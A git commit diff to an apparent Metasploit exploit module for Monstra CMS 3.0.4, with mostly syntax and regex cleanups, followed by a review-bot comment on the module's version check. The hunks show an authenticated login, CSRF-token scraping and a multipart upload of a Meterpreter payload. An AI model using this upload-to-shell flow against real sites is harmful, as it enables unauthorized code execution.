modified regex, id=filesmanager lines

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-09 10:55:29 -05:00
parent bc33078e01
commit 44b9798afb
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 9 additions and 9 deletions


@ -69,11 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown
end
if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i
if res.body =~ /<\/a>.*?Version (\d+\.\d+\.\d+)/i
version = Gem::Version.new($1)
vprint_status("Monstra CMS: #{version}")
if version == '3.0.4'
if version.to_s == '3.0.4'
return CheckCode::Vulnerable
else
return CheckCode::Safe
@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
'vars_post' => {
'login' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'login_submit' => 'Log+In',
},
'login_submit' => 'Log+In'
}
})
cookies = res.get_cookies
@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'admin' '/index.php'),
'cookie' => cookies,
'cookie' => cookies
})
fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
@ -134,9 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote
# Request for CSRF token for file upload.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'admin', '/index.php'),
'vars_get' => 'id=filesmanager',
'vars_get' => {'id' => 'filesmanager'},
'method' => 'GET',
'cookie' => cookies,
'cookie' => cookies
})
# Grabbing CSRF token from body
@ -155,12 +155,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Lets Send Upload request.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'admin', '/index.php'),
'vars_get' => 'id=filesmanager',
'vars_get' => {'id' => 'filesmanager'},
'method' => 'POST',
'cookie' => cookies,
'Connection' => 'close',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
# Cleanup delete payload after get meterpreter.
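Review bot: The version test in the first hunk returns `CheckCode::Vulnerable` on a banner match alone, and it gets there by comparing strings (`version.to_s == '3.0.4'`). A version number scraped from the page body shows what the target claims to run, not that the flaw is reachable, so `CheckCode::Appears` would be the more accurate result. Comparing version objects, `if version == Gem::Version.new('3.0.4')`, also avoids depending on how the version happens to be formatted as a string. Every other version falls through to `CheckCode::Safe`; if releases other than 3.0.4 are affected, which this page does not show, anyone using the check to assess exposure would get false negatives. The enclosing method starts and ends outside the hunk.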